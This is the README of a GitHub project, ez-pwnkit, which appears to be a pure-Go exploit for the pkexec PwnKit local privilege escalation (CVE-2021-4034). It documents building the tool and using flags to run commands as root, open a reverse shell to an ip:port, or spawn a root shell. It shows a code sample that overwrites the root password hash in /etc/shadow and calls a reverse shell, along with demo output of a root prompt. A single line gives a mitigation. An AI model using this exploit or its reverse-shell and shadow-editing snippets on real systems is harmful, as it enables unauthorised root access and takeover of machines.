Skip to content

Latest commit

 

History

History
117 lines (68 loc) · 2.77 KB

README.md

File metadata and controls

117 lines (68 loc) · 2.77 KB

ez-pwnkit

A pure-Go implementation of the CVE-2021-4034 PwnKit exploit.

The exploit use syscall.ForkExec to survive end of main program.

Installation

git clone https://github.com/OXDBXKXO/ez-pwnkit.git
cd ez-pwnkit
make

As the exploit relies on a malicious shared library, a PWN.so file is generated from payload.go and embed in the resulting exploit executable.

The Makefile uses sed to temporarily change the package name of the payload.go file to main, hence making this Makefile Linux-only.

As the Go payload is not as reliable as the C one, the Makefile will compile the exploit with the C payload by default. You can choose to compile with the Go payload using make build_go.

Usage

As standalone executable

$> ./exploit -h
Usage of ./exploit:
  -c string
        Run command as root in separate process
  -o    Pipe output of forked command to terminal
  -r string
        Open a reverse-shell in separate process. Format: ip:port
  -s    Spawn a root shell

The exploit can either be used with a command (-c), as a reverse-shell (-r) or spawn a root shell (-s).

$> ./exploit -s
sh-5.1#
$> ./exploit -c "cat /etc/passwd"
$> ./exploit -o -c "cat /etc/passwd"
[/etc/passwd content]

As package

package main

import (
    "github.com/OXDBXKXO/ez-pwnkit"
)

func main() {
    // Change root password to 'password'
    ez_pwnkit.Command(`sed -i -e 's,^root:[^:]\+:,root:$6$eymNRCK.KxwDM6vu$idH0swGW1nsnLb8fT1QibUho5xg7uGJT7fuiheLZHIi9M4gTSk0qIOlUIk2Mm9/Nz5C.T4GkgkmLcK5BtOPkS0:,' etc/shadow`, false)

    // Open a reverse-shell
	ez_pwnkit.RevShell("127.0.0.1:1337")
}

Note as Command and RevShell use syscall.ForkExec to run the exploit, resulting processes are separate from the main program and survive its end.

Although go-PwnKit can be imported to your project from Github, do not forget that you will execute an untrusted shared library as root. Using a locally compiled PWN.so is hence highly recommended. Just sayin' 😚

Demonstration

$> ./exploit
sh-5.1# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.1#

Mitigation

Patch pkexec if possible, otherwise disable the setuid bit on the pkexec binary.

chmod 0755 /usr/bin/pkexec

Credits

This project is inspired by several other PoCs of the PwnKit exploit.

Thanks to An00bRektn for the straight-forward exploit setup.

Thanks to PaterGottesman and berdav for the clarity of the exploit explanation.

Thanks to dzonerzy for the GIO_USE_VFS trick.